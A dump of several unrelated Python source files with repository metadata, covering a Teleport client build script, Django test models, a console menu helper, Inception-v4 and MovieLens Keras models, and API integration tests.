main_module = sys.modules['__main__']
if hasattr(main_module, '__file__'):
return os.path.realpath(os.path.dirname(main_module.__file__))
else:
return os.getcwd()
def Sentences(*args):
  """Join the non-empty arguments with single spaces."""
  return ' '.join(filter(None, args))
| 38.592233 | 80 | 0.69673 |
da84c603ef3231977a96c020227ad4964a69345c | 9,777 | py | Python | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | 3 | 2019-02-18T09:14:37.000Z | 2019-07-30T08:40:21.000Z | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | null | null | null | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from core import colorconsole as cc
from core import utils
from core.ver import *
from core.context import *
from core.env import env
# Global build context shared by every builder; configured in main() from argv.
ctx = BuildContext()
class BuilderBase:
    """Base class for the per-platform assist builders (no-op defaults)."""

    def __init__(self):
        # Output directory for artifacts; filled in by subclasses that use it.
        self.out_dir = ''

    def build_exe(self):
        pass

    def build_rdp(self):
        pass

    def build_installer(self):
        pass
class BuilderWin(BuilderBase):
    """Windows builder: compiles tp_assist with MSVC and packages an NSIS installer."""

    def __init__(self):
        super().__init__()

    def build_exe(self):
        """Compile tp_assist.exe from the VS2017 solution."""
        cc.i('build tp_assist...')
        sln_file = os.path.join(env.root_path, 'client', 'tp_assist_win', 'tp_assist.vs2017.sln')
        out_file = os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path, 'tp_assist.exe')
        # Remove any stale binary so the ensure_file_exists() check below
        # really verifies that this build produced a fresh one.
        if os.path.exists(out_file):
            utils.remove(out_file)
        utils.msvc_build(sln_file, 'tp_assist', ctx.target_path, ctx.bits_path, False)
        utils.ensure_file_exists(out_file)

    # (A commented-out draft of build_rdp() was removed from here.)

    def build_installer(self):
        """Produce the versioned teleport-assist installer .exe via NSIS."""
        cc.i('build assist installer...')
        name = 'teleport-assist-{}-{}'.format(ctx.dist, VER_TP_ASSIST)
        out_path = os.path.join(env.root_path, 'out', 'installer')
        utils.makedirs(out_path)
        out_file = os.path.join(out_path, '{}.exe'.format(name))
        utils.remove(out_file)
        self._build_installer()
        utils.ensure_file_exists(out_file)

    @staticmethod
    def _build_installer():
        """Stage the app, config and bundled tools under dist/ and run NSIS."""
        tmp_path = os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist')
        tmp_app_path = os.path.join(tmp_path, 'apps')
        tmp_cfg_path = os.path.join(tmp_app_path, 'cfg')
        # Always start from a clean staging directory.
        if os.path.exists(tmp_app_path):
            utils.remove(tmp_app_path)
        utils.makedirs(tmp_app_path)
        utils.makedirs(tmp_cfg_path)
        # Main executable, configuration and TLS material.
        utils.copy_file(os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path), tmp_app_path, 'tp_assist.exe')
        utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, ('tp-assist.windows.json', 'tp-assist.json'))
        utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'cacert.cer')
        utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.key')
        utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.pem')
        utils.copy_ex(os.path.join(env.root_path, 'client', 'tp_assist_win'), tmp_app_path, 'site')
        # Bundled third-party tools: PuTTY, WinSCP and the tprdp helpers.
        utils.makedirs(os.path.join(tmp_app_path, 'tools', 'putty'))
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'putty'), os.path.join(tmp_app_path, 'tools', 'putty'), 'putty.exe')
        utils.makedirs(os.path.join(tmp_app_path, 'tools', 'winscp'))
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'WinSCP.exe')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'license.txt')
        utils.makedirs(os.path.join(tmp_app_path, 'tools', 'tprdp'))
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-client.exe')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-replay.exe')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'libeay32.dll')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'ssleay32.dll')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'msvcr120.dll')
        utils.copy_file(os.path.join(env.root_path, 'client', 'tools'), os.path.join(tmp_app_path, 'tools'), 'securecrt-telnet.vbs')
        # Finally let NSIS assemble the installer from the staged tree.
        utils.nsis_build(os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist', 'installer.nsi'))
class BuilderMacOS(BuilderBase):
    """macOS builder: compiles TP-Assist.app with Xcode and packages a DMG."""

    def __init__(self):
        super().__init__()

    def build_exe(self):
        """Compile TP-Assist.app from the Xcode project."""
        cc.i('build tp_assist...')
        # Xcode configuration names are capitalized ('Debug'/'Release').
        configuration = ctx.target_path.capitalize()
        proj_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'TP-Assist.xcodeproj')
        out_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'build', configuration, 'TP-Assist.app')
        if os.path.exists(out_file):
            utils.remove(out_file)
        utils.xcode_build(proj_file, 'TP-Assist', configuration, False)
        # An .app bundle is a directory; checking its Info.plist proves the
        # build actually produced the bundle.
        utils.ensure_file_exists(os.path.join(out_file, 'Contents', 'Info.plist'))

    def build_installer(self):
        """Package the built app into a versioned DMG image."""
        cc.i('make tp_assist dmg file...')
        json_file = os.path.join(env.root_path, 'dist', 'client', 'macos', 'dmg.json')
        dmg_file = os.path.join(env.root_path, 'out', 'client', 'macos', 'teleport-assist-macos-{}.dmg'.format(VER_TP_ASSIST))
        if os.path.exists(dmg_file):
            utils.remove(dmg_file)
        utils.make_dmg(json_file, dmg_file)
        utils.ensure_file_exists(dmg_file)

    @staticmethod
    def _build_installer():
        # Intentionally a no-op on macOS: packaging happens in
        # build_installer() via make_dmg(). (A commented-out copy of the
        # Windows staging steps was removed from here.)
        return
class BuilderLinux(BuilderBase):
    """Linux builder: the assist client is not supported on Linux."""

    def __init__(self):
        super().__init__()

    def build_exe(self):
        cc.e('not support linux.')

    # (A commented-out build_rdp() stub was removed from here.)

    def build_installer(self):
        cc.e('not support linux.')
def gen_builder(dist):
    """Return the builder for *dist* and record the platform in the context.

    Raises RuntimeError for an unknown platform name.
    """
    builder_classes = {
        'windows': BuilderWin,
        'macos': BuilderMacOS,
        'linux': BuilderLinux,
    }
    builder_cls = builder_classes.get(dist)
    if builder_cls is None:
        raise RuntimeError('unsupported platform.')
    builder = builder_cls()
    ctx.set_dist(dist)
    return builder
def main():
    """Parse sys.argv and run the requested build step for the target platform."""
    if not env.init():
        return

    builder = None
    argv = sys.argv[1:]

    # First pass: collect target/bits flags and an explicit platform, if any.
    for arg in argv:
        if arg == 'debug':
            ctx.set_target(TARGET_DEBUG)
        elif arg == 'x86':
            ctx.set_bits(BITS_32)
        elif arg == 'x64':
            ctx.set_bits(BITS_64)
        elif arg in ctx.dist_all:
            builder = gen_builder(arg)

    # No platform given on the command line: build for the host OS.
    if builder is None:
        builder = gen_builder(ctx.host_os)

    if 'exe' in argv:
        builder.build_exe()
    elif 'installer' in argv:
        builder.build_installer()
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl+C is a normal way to abort a build; exit quietly.
        pass
    except RuntimeError as e:
        cc.e(e.__str__())
    except Exception:
        # Was a bare "except:", which would also swallow SystemExit and
        # GeneratorExit; catch only real errors and report them.
        cc.f('got exception.')
| 41.782051 | 149 | 0.615935 |
2c31f439e5d1a4880464007ba2fe3ff47e96aaa7 | 455 | py | Python | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 65 | 2020-10-06T15:37:49.000Z | 2022-02-24T05:18:28.000Z | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 48 | 2020-10-07T11:14:40.000Z | 2021-02-03T15:07:39.000Z | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 4 | 2020-10-10T18:03:33.000Z | 2020-10-23T07:56:34.000Z | from django.db import models
from django.utils.safestring import mark_safe
class Identity(models.Model):
    """A person's identity; both name fields are optional (nullable)."""
    first_name = models.CharField(max_length=30, null=True)
    last_name = models.CharField(
        max_length=30,
        null=True,
        # mark_safe lets the HTML render verbatim wherever help_text is shown.
        help_text=mark_safe("<strong>Here's some HTML!</strong>"),
    )
class Person(models.Model):
    """Links one Person to exactly one Identity.

    on_delete=PROTECT blocks deleting an Identity that still has a Person.
    """
    identity = models.OneToOneField(
        Identity, related_name="person", on_delete=models.PROTECT
    )
| 25.277778 | 66 | 0.696703 |
44885e97fba996d73ce0ac7c398d95e567adefc2 | 662 | py | Python | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | def showline():
return '-' * 50
def header(txt):
    """Print *txt* centered (width 50) between two horizontal rules."""
    rule = showline()
    print(f'{rule}\n{txt:^50}\n{rule}')
def leiaint(txt):
    """Prompt with *txt* until a valid integer is typed; Ctrl+C returns 0."""
    while True:
        try:
            return int(input(txt))
        except (ValueError, TypeError):
            print('ERRO! Digite um número inteiro válido!')
        except KeyboardInterrupt:
            print('O usuário preferiu não digitar')
            return 0
def leiastr(txt):
    """Prompt with *txt* and return the typed text without surrounding spaces."""
    return str(input(txt)).strip()
def cmenu(lst):
    """Display the main menu with numbered options and return the user's choice."""
    header('MENU PRINCIPAL')
    for numero, opcao in enumerate(lst, start=1):
        print(f'{numero} - {opcao}')
    print(showline())
    return leiaint('Sua Opção: ')
| 20.060606 | 59 | 0.542296 |
bb624269990a68189f4fef67b8b4425a7155e2d9 | 9,847 | py | Python | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | '''
Copyright 2020 TensorFlow Authors and theroyakash
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy as np
# Fix: the package name is all lowercase -- "import tensorFlow" raises
# ModuleNotFoundError because Python module names are case sensitive.
import tensorflow as tf
from tensorflow import keras
# Sys
import warnings
# Keras Core
from keras.layers.convolutional import MaxPooling2D, Convolution2D, AveragePooling2D
from keras.layers import Input, Dropout, Dense, Flatten, Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.merge import concatenate
from keras import regularizers
from keras import initializers
from keras.models import Model
# Backend
from keras import backend as K
# Utils
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
# Implements the Inception Network v4 (http://arxiv.org/pdf/1602.07261v1.pdf) in Keras.
# Remote locations of the pretrained weight files (placeholders for now).
WEIGHTS_PATH = 'data coming soon'
WEIGHTS_PATH_NO_TOP = 'link coming soon'
def preprocess_input(x):
    """Rescale image pixel values from [0, 255] to [-1, 1]."""
    scaled = np.divide(x, 255.0)
    centered = np.subtract(scaled, 0.5)
    return np.multiply(centered, 2.0)
def conv2d_bn(x, nb_filter, num_row, num_col,
              padding='same', strides=(1, 1), use_bias=False):
    """Apply a 2D convolution followed by batch normalization and ReLU.

    (Slightly modified from
    https://github.com/fchollet/keras/blob/master/keras/applications/inception_v3.py)

    Args:
        x: input tensor.
        nb_filter: number of convolution filters.
        num_row, num_col: kernel height and width.
        padding: convolution padding mode.
        strides: convolution strides.
        use_bias: whether the convolution uses a bias vector.

    Returns:
        Output tensor after conv -> batch norm -> ReLU.
    """
    # BatchNormalization must normalize over the channel axis, which depends
    # on the backend's image data format.
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    x = Convolution2D(nb_filter, (num_row, num_col),
                      strides=strides,
                      padding=padding,
                      use_bias=use_bias,
                      kernel_regularizer=regularizers.l2(0.00004),
                      kernel_initializer=initializers.VarianceScaling(scale=2.0, mode='fan_in', distribution='normal', seed=None))(x)
    x = BatchNormalization(axis=channel_axis, momentum=0.9997, scale=False)(x)
    x = Activation('relu')(x)
    return x
def block_inception_a(input):
    """Inception-A block for the 35x35 grid (arXiv:1602.07261)."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Branch 0: 1x1 conv.
    branch_0 = conv2d_bn(input, 96, 1, 1)
    # Branch 1: 1x1 conv -> 3x3 conv.
    branch_1 = conv2d_bn(input, 64, 1, 1)
    branch_1 = conv2d_bn(branch_1, 96, 3, 3)
    # Branch 2: 1x1 conv -> two stacked 3x3 convs.
    branch_2 = conv2d_bn(input, 64, 1, 1)
    branch_2 = conv2d_bn(branch_2, 96, 3, 3)
    branch_2 = conv2d_bn(branch_2, 96, 3, 3)
    # Branch 3: average pooling -> 1x1 conv.
    branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input)
    branch_3 = conv2d_bn(branch_3, 96, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def block_reduction_a(input):
    """Reduction-A block: downsamples the 35x35 grid to 17x17 (arXiv:1602.07261)."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Branch 0: strided 3x3 conv.
    branch_0 = conv2d_bn(input, 384, 3, 3, strides=(2,2), padding='valid')
    # Branch 1: 1x1 -> 3x3 -> strided 3x3 conv.
    branch_1 = conv2d_bn(input, 192, 1, 1)
    branch_1 = conv2d_bn(branch_1, 224, 3, 3)
    branch_1 = conv2d_bn(branch_1, 256, 3, 3, strides=(2,2), padding='valid')
    # Branch 2: parameter-free strided max pooling.
    branch_2 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(input)
    x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
    return x
def block_inception_b(input):
    """Inception-B block for the 17x17 grid (arXiv:1602.07261)."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Branch 0: 1x1 conv.
    branch_0 = conv2d_bn(input, 384, 1, 1)
    # Branch 1: 1x1 -> factorized 7x7 (1x7 then 7x1).
    branch_1 = conv2d_bn(input, 192, 1, 1)
    branch_1 = conv2d_bn(branch_1, 224, 1, 7)
    branch_1 = conv2d_bn(branch_1, 256, 7, 1)
    # Branch 2: 1x1 -> two stacked factorized 7x7 convolutions.
    branch_2 = conv2d_bn(input, 192, 1, 1)
    branch_2 = conv2d_bn(branch_2, 192, 7, 1)
    branch_2 = conv2d_bn(branch_2, 224, 1, 7)
    branch_2 = conv2d_bn(branch_2, 224, 7, 1)
    branch_2 = conv2d_bn(branch_2, 256, 1, 7)
    # Branch 3: average pooling -> 1x1 conv.
    branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input)
    branch_3 = conv2d_bn(branch_3, 128, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def block_reduction_b(input):
    """Reduction-B block: downsamples the 17x17 grid to 8x8 (arXiv:1602.07261)."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Branch 0: 1x1 -> strided 3x3 conv.
    branch_0 = conv2d_bn(input, 192, 1, 1)
    branch_0 = conv2d_bn(branch_0, 192, 3, 3, strides=(2, 2), padding='valid')
    # Branch 1: 1x1 -> factorized 7x7 -> strided 3x3 conv.
    branch_1 = conv2d_bn(input, 256, 1, 1)
    branch_1 = conv2d_bn(branch_1, 256, 1, 7)
    branch_1 = conv2d_bn(branch_1, 320, 7, 1)
    branch_1 = conv2d_bn(branch_1, 320, 3, 3, strides=(2,2), padding='valid')
    # Branch 2: parameter-free strided max pooling.
    branch_2 = MaxPooling2D((3, 3), strides=(2, 2), padding='valid')(input)
    x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
    return x
def block_inception_c(input):
    """Inception-C block for the 8x8 grid; branches 1 and 2 fan out into
    parallel 1x3 / 3x1 convolutions that are concatenated (arXiv:1602.07261)."""
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Branch 0: 1x1 conv.
    branch_0 = conv2d_bn(input, 256, 1, 1)
    # Branch 1: 1x1, then parallel 1x3 and 3x1 outputs.
    branch_1 = conv2d_bn(input, 384, 1, 1)
    branch_10 = conv2d_bn(branch_1, 256, 1, 3)
    branch_11 = conv2d_bn(branch_1, 256, 3, 1)
    branch_1 = concatenate([branch_10, branch_11], axis=channel_axis)
    # Branch 2: 1x1 -> 3x1 -> 1x3, then parallel 1x3 and 3x1 outputs.
    branch_2 = conv2d_bn(input, 384, 1, 1)
    branch_2 = conv2d_bn(branch_2, 448, 3, 1)
    branch_2 = conv2d_bn(branch_2, 512, 1, 3)
    branch_20 = conv2d_bn(branch_2, 256, 1, 3)
    branch_21 = conv2d_bn(branch_2, 256, 3, 1)
    branch_2 = concatenate([branch_20, branch_21], axis=channel_axis)
    # Branch 3: average pooling -> 1x1 conv.
    branch_3 = AveragePooling2D((3, 3), strides=(1, 1), padding='same')(input)
    branch_3 = conv2d_bn(branch_3, 256, 1, 1)
    x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
    return x
def inception_v4_base(input):
    """Build the Inception-v4 feature extractor: stem, 4x Inception-A,
    Reduction-A, 7x Inception-B, Reduction-B and 3x Inception-C blocks.

    Returns the final feature map tensor (8 x 8 x 1536 for 299x299 input).
    """
    if K.image_data_format() == 'channels_first':
        channel_axis = 1
    else:
        channel_axis = -1
    # Input shape is 299 x 299 x 3 (channels_last) or 3 x 299 x 299 (channels_first).
    net = conv2d_bn(input, 32, 3, 3, strides=(2,2), padding='valid')
    net = conv2d_bn(net, 32, 3, 3, padding='valid')
    net = conv2d_bn(net, 64, 3, 3)
    # Stem: parallel strided pooling / strided conv, concatenated.
    branch_0 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
    branch_1 = conv2d_bn(net, 96, 3, 3, strides=(2,2), padding='valid')
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    # Stem: parallel plain / factorized-7x7 conv towers.
    branch_0 = conv2d_bn(net, 64, 1, 1)
    branch_0 = conv2d_bn(branch_0, 96, 3, 3, padding='valid')
    branch_1 = conv2d_bn(net, 64, 1, 1)
    branch_1 = conv2d_bn(branch_1, 64, 1, 7)
    branch_1 = conv2d_bn(branch_1, 64, 7, 1)
    branch_1 = conv2d_bn(branch_1, 96, 3, 3, padding='valid')
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    # Stem: final strided conv / pooling pair.
    branch_0 = conv2d_bn(net, 192, 3, 3, strides=(2,2), padding='valid')
    branch_1 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
    net = concatenate([branch_0, branch_1], axis=channel_axis)
    # 35 x 35 x 384
    # 4 x Inception-A blocks
    for idx in range(4):
        net = block_inception_a(net)
    # 35 x 35 x 384
    # Reduction-A block
    net = block_reduction_a(net)
    # 17 x 17 x 1024
    # 7 x Inception-B blocks
    for idx in range(7):
        net = block_inception_b(net)
    # 17 x 17 x 1024
    # Reduction-B block
    net = block_reduction_b(net)
    # 8 x 8 x 1536
    # 3 x Inception-C blocks
    for idx in range(3):
        net = block_inception_c(net)
    return net
def inception_v4(num_classes, dropout_keep_prob, weights, include_top):
    '''
    Creates the Inception v4 network.

    Args:
        num_classes: number of output classes.
        dropout_keep_prob: value passed to the final Dropout layer.
            NOTE(review): Keras ``Dropout(rate)`` drops this fraction of
            units, while the parameter name suggests a *keep* probability --
            confirm the intended semantics before changing the default.
        weights: 'imagenet' to download pretrained weights, otherwise None.
        include_top: whether to append the pooling/dropout/softmax head.

    Returns:
        An uncompiled keras Model.
    '''
    # Input shape is 299 x 299 x 3 (tf) or 3 x 299 x 299 (th)
    if K.image_data_format() == 'channels_first':
        inputs = Input((3, 299, 299))
    else:
        inputs = Input((299, 299, 3))
    # Make inception base
    x = inception_v4_base(inputs)
    # Final pooling and prediction
    if include_top:
        # 1 x 1 x 1536
        x = AveragePooling2D((8,8), padding='valid')(x)
        x = Dropout(dropout_keep_prob)(x)
        x = Flatten()(x)
        # 1536
        x = Dense(units=num_classes, activation='softmax')(x)
    model = Model(inputs, x, name='inception_v4')
    # load weights
    if weights == 'imagenet':
        if K.image_data_format() == 'channels_first':
            if K.backend() == 'tensorflow':
                warnings.warn('You are using the TensorFlow backend, yet you '
                              'are using the Theano '
                              'image data format convention '
                              '(`image_data_format="channels_first"`). '
                              'For best performance, set '
                              '`image_data_format="channels_last"` in '
                              'your Keras config '
                              'at ~/.keras/keras.json.')
        # Weight files differ depending on whether the classifier head exists.
        if include_top:
            weights_path = get_file(
                'inception-v4_weights_tf_dim_ordering_tf_kernels.h5',
                WEIGHTS_PATH,
                cache_subdir='models',
                md5_hash='9fe79d77f793fe874470d84ca6ba4a3b')
        else:
            weights_path = get_file(
                'inception-v4_weights_tf_dim_ordering_tf_kernels_notop.h5',
                WEIGHTS_PATH_NO_TOP,
                cache_subdir='models',
                md5_hash='9296b46b5971573064d12e4669110969')
        model.load_weights(weights_path, by_name=True)
    return model
def create_model(num_classes=1001, dropout_prob=0.2, weights=None, include_top=True):
    """Convenience wrapper that builds an Inception-v4 model."""
    return inception_v4(num_classes=num_classes,
                        dropout_keep_prob=dropout_prob,
                        weights=weights,
                        include_top=include_top)
| 32.391447 | 133 | 0.643242 |
d54673b297fc0493bc7cb50661d05eecdfcc3a7a | 2,055 | py | Python | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | 3 | 2018-07-26T12:48:12.000Z | 2018-08-16T01:00:05.000Z | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | null | null | null | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | null | null | null | # Copyright (C) 2018, Baking Bits Studios - All Rights Reserved
import requests, json
from base import TestBase
# TODO: Created, Delete
class TestChannelRoutes(TestBase):
    """Integration tests for the /channels API routes."""

    def setup_method(self, test_method):
        super(TestChannelRoutes, self).setup_method(test_method)
        # Base URL shared by every request in this class.
        self.url = f"{self.base}/channels"

    def teardown_method(self, test_method):
        super(TestChannelRoutes, self).teardown_method(test_method)

    def test_get_channels(self):
        """Listing channels as an authenticated normal user returns 200."""
        cookies = self.get_authn_cookies_user_normal()
        r = requests.get(self.url, headers=self.read_headers, cookies=cookies)
        assert 200 == r.status_code
        # TODO: At least one, verify fields, etc.
        # [{"Name":"my public channel","Description":"my public channel description","Topic":"some topic","ID":1,"OwnerID":1,"IsPrivate":false,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1},{"Name":"my private channel","Description":"my private channel description","Topic":"","ID":2,"OwnerID":1,"IsPrivate":true,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1}]

    def test_update_channel(self,
                            create_channel_normal_user):
        """PUT on a channel updates mutable fields such as Topic."""
        cookies = self.get_authn_cookies_user_normal()
        channel_id = create_channel_normal_user['ID']
        url = self.url + f'/{channel_id}'
        data = create_channel_normal_user
        data['Topic'] = 'Updated topic'
        data = json.dumps(data)
        r = requests.put(url, data=data, headers=self.read_write_headers, cookies=cookies)
        assert 200 == r.status_code
        assert 'Updated topic' == r.json()['Topic']

    def test_get_channel(self,
                         create_channel_normal_user):
        """GET on a single channel returns that channel's data."""
        cookies = self.get_authn_cookies_user_normal()
        channel_id = create_channel_normal_user['ID']
        url = self.url + f'/{channel_id}'
        r = requests.get(url, cookies=cookies)
        assert 200 == r.status_code
        assert channel_id == r.json()['ID']
| 41.938776 | 458 | 0.665693 |
4a515836d1175cb1ec0a8c559bb5981b822f8f76 | 3,111 | py | Python | uncertainty_baselines/models/movielens.py | athon-millane/uncertainty-baselines | aa504fc51aac6d4cac47dbd34aa672c670dfbd28 | [
"Apache-2.0"
] | 2 | 2022-02-22T10:22:46.000Z | 2022-03-09T09:22:41.000Z | uncertainty_baselines/models/movielens.py | PGM-Lab/2022-AISTATS-diversity | 63df2e5f29cdaefe49626439bbe13289f37eed36 | [
"Apache-2.0"
] | null | null | null | uncertainty_baselines/models/movielens.py | PGM-Lab/2022-AISTATS-diversity | 63df2e5f29cdaefe49626439bbe13289f37eed36 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""TF Keras model for an MLP for Criteo, from arxiv.org/abs/1906.02530."""
from typing import Any, Dict, List
import tensorflow as tf
# Model hyperparameters.
# Hash-bucket counts per categorical feature. NOTE(review): these look like
# MovieLens-1M cardinalities (max id + 1) -- confirm against the dataset.
_CATEGORICAL_BUCKET_DICT = {
    'user_id': 6041,
    'movie_id': 3953,
}
# Embedding dimension used for each categorical feature.
_CATEGORICAL_EMBED_DIM = {
    'user_id': 8,
    'movie_id': 8,
}
# Hidden-layer widths of the MLP head.
_LAYER_SIZES = [50, 20, 10]
def _make_input_layers(batch_size: int) -> Dict[str, tf.keras.layers.Input]:
  """Defines string-typed scalar input layers for the tf.keras model."""
  # TODO(chenzhe): Add more user and movie related features as inputs. Currently
  # only used movie_id and user_id as the input features.
  out = {
      'movie_id': tf.keras.layers.Input(
          [], batch_size=batch_size, dtype=tf.string, name='movie_id'),
      'user_id': tf.keras.layers.Input(
          [], batch_size=batch_size, dtype=tf.string, name='user_id')
  }
  return out
# In order to get better typing we would need to be able to reference the
# FeatureColumn class defined here, but it is not exported:
# https://github.com/tensorflow/tensorflow/blob/v2.1.0/tensorflow/python/feature_column/feature_column_v2.py#L2121.
def _make_feature_columns() -> List[Any]:
  """Build feature_columns for converting features to a dense vector."""
  categorical_feature_columns = []
  # TODO(chenzhe): Add more user and movie related features as inputs. Currently
  # only used movie_id and user_id as the input features.
  categorical_feature_arr = ['user_id', 'movie_id']
  for name in categorical_feature_arr:
    # Hash each raw string id into a fixed number of buckets, then learn an
    # embedding per bucket.
    feature_col = tf.feature_column.categorical_column_with_hash_bucket(
        name, _CATEGORICAL_BUCKET_DICT[name])
    categorical_feature_columns.append(
        tf.feature_column.embedding_column(
            feature_col, _CATEGORICAL_EMBED_DIM[name]))
  return categorical_feature_columns
def create_model(
    batch_size: int,
    **unused_kwargs: Dict[str, Any]) -> tf.keras.models.Model:
  """Creates a fully connected tf.keras.Model for MovieLens.

  Args:
    batch_size: static batch size baked into the input layers.
    **unused_kwargs: accepted for interface compatibility; ignored.

  Returns:
    An uncompiled tf.keras.Model emitting one logit per example.
  """
  categorical_feature_columns = _make_feature_columns()
  input_layer = _make_input_layers(batch_size)
  # Embed the categorical inputs into a single dense feature vector.
  categorical_features = tf.keras.layers.DenseFeatures(
      categorical_feature_columns)(input_layer)
  x = tf.keras.layers.BatchNormalization()(categorical_features)
  for size in _LAYER_SIZES:
    x = tf.keras.layers.Dense(size, activation='relu')(x)
  # Single logit per example.
  logits = tf.keras.layers.Dense(1)(x)
  return tf.keras.models.Model(
      inputs=input_layer, outputs=logits, name='movielens_mlp')
| 36.6 | 115 | 0.738669 |
b6009e0f3bf594da238530174d55b94f3f898959 | 1,515 | py | Python | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
